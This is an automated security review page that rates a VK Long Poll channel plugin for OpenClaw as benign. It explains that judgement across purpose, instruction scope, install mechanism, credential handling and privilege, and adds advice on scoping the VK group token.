Pluginv2026.1.1

ClawScan security

VK Bots Channel Plugin · ClawHub's context-aware review of the artifact, metadata, and declared behavior.

Scanner verdict

BenignMar 27, 2026, 3:16 PM

Verdict: benign
Confidence: high
Model: gpt-5-mini
Summary: The plugin’s code, docs, and runtime instructions are consistent with a VK Long Poll channel plugin and its requested items are proportional to that purpose.
Guidance: This plugin appears to do what it says: it connects OpenClaw to VK using a VK group token. Before installing, make sure you: (1) provide a VK group token scoped only for the bot's needs and store it in the suggested secrets path (~/.openclaw/workspace/secrets/), (2) review the plugin code if you don't trust the publisher (the package uses VK API endpoints and local secret files only), and (3) confirm the OpenClaw host version compatibility in package.json. If you won't trust a community plugin with a VK token, run it in an isolated environment or review/compile the code locally rather than using a pre-built package.

Review Dimensions

Purpose & Capability: okName/description (VK Bots channel plugin) match the code and README: the package implements a VK Long Poll direct-message channel and requires a VK group token for operation. There are no unrelated credentials, binaries, or install steps that don't belong to a channel plugin.
Instruction Scope: okSKILL.md instructs only to install the plugin, create a VK group token file under ~/.openclaw/workspace/secrets/, and run OpenClaw channel commands; runtime instructions and repo files reference only OpenClaw APIs, VK API endpoints (api.vk.com), and local secret storage. There is no instruction to read unrelated files or exfiltrate data to unexpected endpoints.
Install Mechanism: okNo installer that downloads arbitrary code is declared in the registry metadata; package is a normal Node/TypeScript plugin with package.json and standard dev tooling. The repo is intended for npm publication (openclaw.install.npmSpec) and includes standard CI/release workflows — nothing indicates a risky external download or obfuscated install mechanism.
Credentials: noteThe plugin operates with a VK group token (provided via token file, direct config, or env var such as VK_GROUP_TOKEN). The registry metadata lists no required env vars, which is reasonable because the token is optional at install time, but users must supply a VK token for the plugin to function. Requesting a single VK token is proportional to the plugin's purpose; do not reuse a token with broader privileges than necessary.
Persistence & Privilege: okalways is false and disable-model-invocation is default (agent can call it autonomously), which is appropriate for a channel plugin. The plugin does not request permanent system-wide privileges or attempt to modify other plugins' configuration.